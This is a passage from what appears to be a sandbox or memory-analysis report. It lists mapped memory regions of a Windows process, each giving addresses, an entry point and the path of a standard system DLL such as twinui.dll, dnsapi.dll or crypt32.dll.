"\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 1020 start_va = 0x7ffb551d0000 end_va = 0x7ffb5521ffff monitored = 0 entry_point = 0x7ffb551d2580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 1021 start_va = 0x7ffb55220000 end_va = 0x7ffb556bffff monitored = 0 entry_point = 0x7ffb552b8740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1022 start_va = 0x7ffb556c0000 end_va = 0x7ffb55709fff monitored = 0 entry_point = 0x7ffb556c5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 1023 start_va = 0x7ffb55710000 end_va = 0x7ffb55779fff monitored = 0 entry_point = 0x7ffb55725e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1024 start_va = 0x7ffb55780000 end_va = 0x7ffb557e4fff monitored = 0 entry_point = 0x7ffb55784c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1025 start_va = 0x7ffb557f0000 end_va = 0x7ffb55a63fff monitored = 0 entry_point = 0x7ffb55860400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1026 start_va = 0x7ffb55a70000 end_va = 0x7ffb55b3dfff monitored = 0 entry_point = 0x7ffb55aa14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 1027 start_va = 0x7ffb55b40000 end_va = 0x7ffb55c38fff monitored = 0 entry_point = 0x7ffb55b88000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 1028 start_va = 0x7ffb55c40000 end_va = 0x7ffb55c54fff monitored = 0 entry_point = 0x7ffb55c42c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 1029 start_va = 0x7ffb55e30000 end_va = 0x7ffb55ee0fff monitored = 0 entry_point = 0x7ffb55e408f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 1030 start_va = 0x7ffb55f00000 end_va = 0x7ffb55f14fff monitored = 0 entry_point = 0x7ffb55f01ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 1031 start_va = 0x7ffb55fa0000 end_va = 0x7ffb55fadfff monitored = 0 entry_point = 0x7ffb55fa1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1032 start_va = 0x7ffb55fb0000 end_va = 0x7ffb5620cfff monitored = 0 entry_point = 0x7ffb56038610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 1033 start_va = 0x7ffb56210000 end_va = 0x7ffb56218fff monitored = 0 entry_point = 0x7ffb56211480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 1034 start_va = 0x7ffb564a0000 end_va = 0x7ffb564eafff monitored = 0 entry_point = 0x7ffb564b7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 1035 start_va = 0x7ffb56610000 end_va = 0x7ffb56897fff monitored = 0 entry_point = 0x7ffb5666f670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 1036 start_va = 0x7ffb568a0000 end_va = 0x7ffb568bafff monitored = 0 entry_point = 0x7ffb568a1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1037 start_va = 0x7ffb56bd0000 end_va = 0x7ffb56be3fff monitored = 0 entry_point = 0x7ffb56bd50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1038 start_va = 0x7ffb56c50000 end_va = 0x7ffb56c6ffff monitored = 0 entry_point = 0x7ffb56c51920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 1039 start_va = 0x7ffb56c80000 end_va = 0x7ffb56c8afff monitored = 0 entry_point = 0x7ffb56c81d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1040 start_va = 0x7ffb56ce0000 end_va = 0x7ffb56cf9fff monitored = 0 entry_point = 0x7ffb56ce2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1041 start_va = 0x7ffb56d00000 end_va = 0x7ffb56d15fff monitored = 0 entry_point = 0x7ffb56d019f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1042 start_va = 0x7ffb56e70000 end_va = 0x7ffb56f1dfff monitored = 0 entry_point = 0x7ffb56e880c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1043 start_va = 0x7ffb57080000 end_va = 0x7ffb570d4fff monitored = 0 entry_point = 0x7ffb57083fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1044 start_va = 0x7ffb57250000 end_va = 0x7ffb57290fff monitored = 0 entry_point = 0x7ffb57254840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1045 start_va = 0x7ffb57360000 end_va = 0x7ffb57397fff monitored = 0 entry_point = 0x7ffb57378cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1046 start_va = 0x7ffb573a0000 end_va = 0x7ffb5740cfff monitored = 0 entry_point = 0x7ffb573ad750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 1047 start_va = 0x7ffb57440000 end_va = 0x7ffb574affff monitored = 0 entry_point = 0x7ffb57462960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1048 start_va = 0x7ffb57500000 end_va = 0x7ffb575c7fff monitored = 0 entry_point = 0x7ffb575413f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1049 start_va = 0x7ffb575d0000 end_va = 0x7ffb57630fff monitored = 0 entry_point = 0x7ffb575d4b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1050 start_va = 0x7ffb57b40000 end_va = 0x7ffb57b55fff monitored = 0 entry_point = 0x7ffb57b43380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 1051 start_va = 0x7ffb57b60000 end_va = 0x7ffb57b8dfff monitored = 0 entry_point = 0x7ffb57b66580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1052 start_va = 0x7ffb57b90000 end_va = 0x7ffb57ba5fff monitored = 0 entry_point = 0x7ffb57b91b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1053 start_va = 0x7ffb57c20000 end_va = 0x7ffb57c47fff monitored = 0 entry_point = 0x7ffb57c28c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 1054 start_va = 0x7ffb57c70000 end_va = 0x7ffb57c7bfff monitored = 0 entry_point = 0x7ffb57c71860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1055 start_va = 0x7ffb58080000 end_va = 0x7ffb58088fff monitored = 0 entry_point = 0x7ffb58081b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1056 start_va = 0x7ffb58090000 end_va = 0x7ffb5809ffff monitored = 0 entry_point = 0x7ffb58093d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 1057 start_va = 0x7ffb580a0000 end_va = 0x7ffb580edfff monitored = 0 entry_point = 0x7ffb580b1ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1058 start_va = 0x7ffb580f0000 end_va = 0x7ffb58187fff monitored = 0 entry_point = 0x7ffb58113980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1059 start_va = 0x7ffb581e0000 end_va = 0x7ffb581f8fff monitored = 0 entry_point = 0x7ffb581e4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1060 start_va = 0x7ffb58200000 end_va = 0x7ffb5820afff monitored = 0 entry_point = 0x7ffb58201a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 1061 start_va = 0x7ffb58210000 end_va = 0x7ffb582affff monitored = 0 entry_point = 0x7ffb582356b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1062 start_va = 0x7ffb586a0000 end_va = 0x7ffb58719fff monitored = 0 entry_point = 0x7ffb586c7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1063 start_va = 0x7ffb58760000 end_va = 0x7ffb587f1fff monitored = 0 entry_point = 0x7ffb587aa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1064 start_va = 0x7ffb588f0000 end_va = 0x7ffb58900fff monitored = 0 entry_point = 0x7ffb588f3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1065 start_va = 0x7ffb58910000 end_va = 0x7ffb58accfff monitored = 0 entry_point = 0x7ffb5893af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 1066 start_va = 0x7ffb58ad0000 end_va = 0x7ffb58e51fff monitored = 0 entry_point = 0x7ffb58b21220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1067 start_va = 0x7ffb58e60000 end_va = 0x7ffb58f95fff monitored = 0 entry_point = 0x7ffb58e8f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1068 start_va = 0x7ffb59fe0000 end_va = 0x7ffb5a088fff monitored = 0 entry_point = 0x7ffb5a009010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 1069 start_va = 0x7ffb5a090000 end_va = 0x7ffb5a19dfff monitored = 0 entry_point = 0x7ffb5a0deaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1070 start_va = 0x7ffb5a1a0000 end_va = 0x7ffb5a209fff monitored = 0 entry_point = 0x7ffb5a1a9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 1071 start_va = 0x7ffb5a210000 end_va = 0x7ffb5a21bfff monitored = 0 entry_point = 0x7ffb5a211470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 1072 start_va = 0x7ffb5a280000 end_va = 0x7ffb5a301fff monitored = 0 entry_point = 0x7ffb5a284ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1073 start_va = 0x7ffb5a310000 end_va = 0x7ffb5a36cfff monitored = 0 entry_point = 0x7ffb5a316c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1074 start_va = 0x7ffb5a370000 end_va = 0x7ffb5a3c0fff monitored = 0 entry_point = 0x7ffb5a3725e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1075 start_va = 0x7ffb5a3d0000 end_va = 0x7ffb5a495fff monitored = 0 entry_point = 0x7ffb5a3d3ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1076 start_va = 0x7ffb5a4c0000 end_va = 0x7ffb5a560fff monitored = 0 entry_point = 0x7ffb5a4c3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1077 start_va = 0x7ffb5a800000 end_va = 0x7ffb5a863fff monitored = 0 entry_point = 0x7ffb5a815ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1078 start_va = 0x7ffb5ab60000 end_va = 0x7ffb5b0a4fff monitored = 0 entry_point = 0x7ffb5acfa450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 1079 start_va = 0x7ffb5b0b0000 end_va = 0x7ffb5b31efff monitored = 0 entry_point = 0x7ffb5b1622b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 1080 start_va = 0x7ffb5b580000 end_va = 0x7ffb5b5cafff monitored = 0 entry_point = 0x7ffb5b5972b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1081 start_va = 0x7ffb5b5d0000 end_va = 0x7ffb5b780fff monitored = 0 entry_point = 0x7ffb5b6661a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1082 start_va = 0x7ffb5b900000 end_va = 0x7ffb5b93ffff monitored = 0 entry_point = 0x7ffb5b913750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 1083 start_va = 0x7ffb5b940000 end_va = 0x7ffb5bdd2fff monitored = 0 entry_point = 0x7ffb5b94f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1084 start_va = 0x7ffb5bde0000 end_va = 0x7ffb5be46fff monitored = 0 entry_point = 0x7ffb5bdfe710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1085 start_va = 0x7ffb5be50000 end_va = 0x7ffb5be9efff monitored = 0 entry_point = 0x7ffb5be57ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 1086 start_va = 0x7ffb5bea0000 end_va = 0x7ffb5bf41fff monitored = 0 entry_point = 0x7ffb5bec0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1087 start_va = 0x7ffb5bf50000 end_va = 0x7ffb5c1f7fff monitored = 0 entry_point = 0x7ffb5bfe3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 1088 start_va = 0x7ffb5c200000 end_va = 0x7ffb5c221fff monitored = 0 entry_point = 0x7ffb5c201a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1089 start_va = 0x7ffb5c250000 end_va = 0x7ffb5c30dfff monitored = 0 entry_point = 0x7ffb5c292d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 1090 start_va = 0x7ffb5c310000 end_va = 0x7ffb5c3f2fff monitored = 0 entry_point = 0x7ffb5c347da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 1091 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1092 start_va = 0x7ffb5c8d0000 end_va = 0x7ffb5c8ebfff monitored = 0 entry_point = 0x7ffb5c8d37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1093 start_va = 0x7ffb5c8f0000 end_va = 0x7ffb5c924fff monitored = 0 entry_point = 0x7ffb5c8f3cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1094 start_va = 0x7ffb5c930000 end_va = 0x7ffb5c942fff monitored = 0 entry_point = 0x7ffb5c932760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1095 start_va = 0x7ffb5c950000 end_va = 0x7ffb5c974fff monitored = 0 entry_point = 0x7ffb5c952300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1096 start_va = 0x7ffb5c9b0000 end_va = 0x7ffb5c9d4fff monitored = 0 entry_point = 0x7ffb5c9c5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1097 start_va = 0x7ffb5c9e0000 end_va = 0x7ffb5ca12fff monitored = 0 entry_point = 0x7ffb5c9e3800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1098 start_va = 0x7ffb5ca20000 end_va = 0x7ffb5ca34fff monitored = 0 entry_point = 0x7ffb5ca22850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1099 start_va = 0x7ffb5ca40000 end_va = 0x7ffb5ca7bfff monitored = 0 entry_point = 0x7ffb5ca425e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1100 start_va = 0x7ffb5caa0000 end_va = 0x7ffb5cb18fff monitored = 0 entry_point = 0x7ffb5cabfb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1101 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1102 start_va = 0x7ffb5cc90000 end_va = 0x7ffb5ccb6fff monitored = 0 entry_point = 0x7ffb5cc97940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1103 start_va = 0x7ffb5cce0000 end_va = 0x7ffb5cd89fff monitored = 0 entry_point = 0x7ffb5cd07910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1104 start_va = 0x7ffb5cd90000 end_va = 0x7ffb5ce8ffff monitored = 0 entry_point = 0x7ffb5cdd0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1105 start_va = 0x7ffb5cff0000 end_va = 0x7ffb5d019fff monitored = 0 entry_point = 0x7ffb5cff8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1106 start_va = 0x7ffb5d410000 end_va = 0x7ffb5d503fff monitored = 0 entry_point = 0x7ffb5d41a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1107 start_va = 0x7ffb5d680000 end_va = 0x7ffb5d68bfff monitored = 0 entry_point = 0x7ffb5d6827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1108 start_va = 0x7ffb5d760000 end_va = 0x7ffb5d790fff monitored = 0 entry_point = 0x7ffb5d767d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1109 start_va = 0x7ffb5d7c0000 end_va = 0x7ffb5d839fff monitored = 0 entry_point = 0x7ffb5d7e1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1110 start_va = 0x7ffb5d8c0000 end_va = 0x7ffb5d8c9fff monitored = 0 entry_point = 0x7ffb5d8c1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1111 start_va = 0x7ffb5d9d0000 end_va = 0x7ffb5d9eefff monitored = 0 entry_point = 0x7ffb5d9d5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1112 start_va = 0x7ffb5db40000 end_va = 0x7ffb5db9bfff monitored = 0 entry_point = 0x7ffb5db56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1113 start_va = 0x7ffb5dbf0000 end_va = 0x7ffb5dc06fff monitored = 0 entry_point = 0x7ffb5dbf79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1114 start_va = 0x7ffb5dd10000 end_va = 0x7ffb5dd1afff monitored = 0 entry_point = 0x7ffb5dd119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1115 start_va = 0x7ffb5dda0000 end_va = 0x7ffb5ddd9fff monitored = 0 entry_point = 0x7ffb5dda8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1116 start_va = 0x7ffb5dde0000 end_va = 0x7ffb5de06fff monitored = 0 entry_point = 0x7ffb5ddf0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1117 start_va = 0x7ffb5def0000 end_va = 0x7ffb5df1cfff monitored = 0 entry_point = 0x7ffb5df09d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1118 start_va = 0x7ffb5e080000 end_va = 0x7ffb5e0d5fff monitored = 0 entry_point = 0x7ffb5e090bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1119 start_va = 0x7ffb5e100000 end_va = 0x7ffb5e128fff monitored = 0 entry_point = 0x7ffb5e114530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1120 start_va = 0x7ffb5e130000 end_va = 0x7ffb5e1c8fff monitored = 0 entry_point = 0x7ffb5e15f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1121 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1122 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1123 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1124 start_va = 0x7ffb5e2f0000 end_va = 0x7ffb5e2fffff monitored = 0 entry_point = 0x7ffb5e2f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1125 start_va = 0x7ffb5e390000 end_va = 0x7ffb5e556fff monitored = 0 entry_point = 0x7ffb5e3edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1126 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = 